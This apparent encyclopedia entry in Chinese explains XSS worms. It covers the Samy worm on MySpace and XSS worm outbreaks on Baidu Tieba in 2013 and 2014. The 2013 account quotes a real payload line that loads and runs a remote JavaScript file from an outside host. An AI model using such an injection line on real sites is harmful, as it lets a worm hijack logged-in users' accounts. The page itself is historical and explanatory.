XSS蠕虫

✍ dations ◷ 2025-09-08 21:24:46 #注入漏洞,蠕虫病毒

xss蠕虫(cross site scripting worm)是一种跨站病毒,通常由脚本语言Javascript写成,它借由网站访问者传播

历史第一个XSS蠕虫是针对网站Myspace的Samy,它在20小时内感染了100万个账户,作者Samy Kamkar之后被起诉

见对新浪微博的争议#XSS.E6.BC.8F.E6.B4.9E

2013年5月19日, 百度贴吧转帖功能再度出现xss漏洞,大量贴吧内充斥接近满版面, 包含代码getScript('//xss.retaker.me/1.js')为标题的帖子,当已登陆用户打开这样的帖子,用户所持账户便以相同方式在多个贴吧转帖原作者的帖,部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染

2014年3月9日, 百度贴吧转帖功能再度出现xss漏洞

由于XSS蠕虫基于浏览器而不是操作系统,取决于其依赖网站的规模,它可以在短时间内达到对巨大数量的计算机感染

相关

  • 卫生福利部疾病管制署卫生福利部疾病管制署(简称疾管署),是中华民国卫生福利部辖下的一个所属机关,负责建立现代化防疫体系。
  • 机器人焊接机器人焊接是工业机器人和焊接源的集成应用方式,其应用场景多是工厂流水线上自动化焊接生产为主,代替人工劳动及高危环境工作。像是熔化极气体保护电弧焊之类的焊接程序也可能
  • 约翰内斯·谷登堡约翰内斯·根斯弗莱施·拉登·谷登堡(德语:Johannes Gensfleisch zur Laden zum Gutenberg;1398年-1468年2月3日),简称约翰内斯·谷登堡(Johannes Gutenberg),也译作古腾堡、古滕贝格
  • 普通潜鸟普通潜鸟(学名:Gavia immer),也叫北方大潜鸟,是广泛分布在北美洲的一种潜鸟,被铸造在加拿大一元硬币上,以及20加元纸币 (1986 Birds of Canada Series) 的背面。普通潜鸟是加拿大安
  • 弘治弘治(1488年至1505年)为中国明朝第九个皇帝明孝宗朱祐樘的年号,前后共十八年。弘治年间,明朝政治清明,经济持续发展,史称弘治中兴。弘治十八年五月明武宗即位沿用。出自《北齐书》
  • 卡累利阿地峡卡累利阿地峡(俄语:Карельский перешеек,芬兰语:Karjalankannas)是连接斯堪的纳维亚半岛与欧亚大陆的峡地,地峡两边为芬兰湾和拉多加湖。1929年芬兰开始修建横
  • ADD Loving itADD & Loving It?!(中文:注意力缺失症&喜爱它?! )是一部由Rick Green(英语:Rick Green)和明星Patrick McKenna(英语:Patrick McKenna)导演的加拿大纪录片。《ADD & Loving It?!》2009
  • 秋季是一年四季之中的第三季。秋季的时候,自然景观最明显的变化在树木上面,城市里会开始清扫大量的落叶,山区则涌进不少观赏红叶的游客们。秋季是四季中的一季,在夏季与冬季之间
  • 各国警察数量列表各国(包括地区)警察数量列表,依照其英文名字排列。此处的“警务人员”不特指一国内政部(公安部)管辖下的人员,还包括供职于国家安全机构、策反机构、谍报排查机构、特殊侦讯机构、
  • 马柳斯·约普马柳斯·约普(波兰语:Mariusz Jop;1978年8月3日-)是一位波兰足球运动员。在场上的位置是后卫。他效力过的最后一家球队是戈尔尼克扎布热。他也是波兰国家足球队的一员,曾代表波兰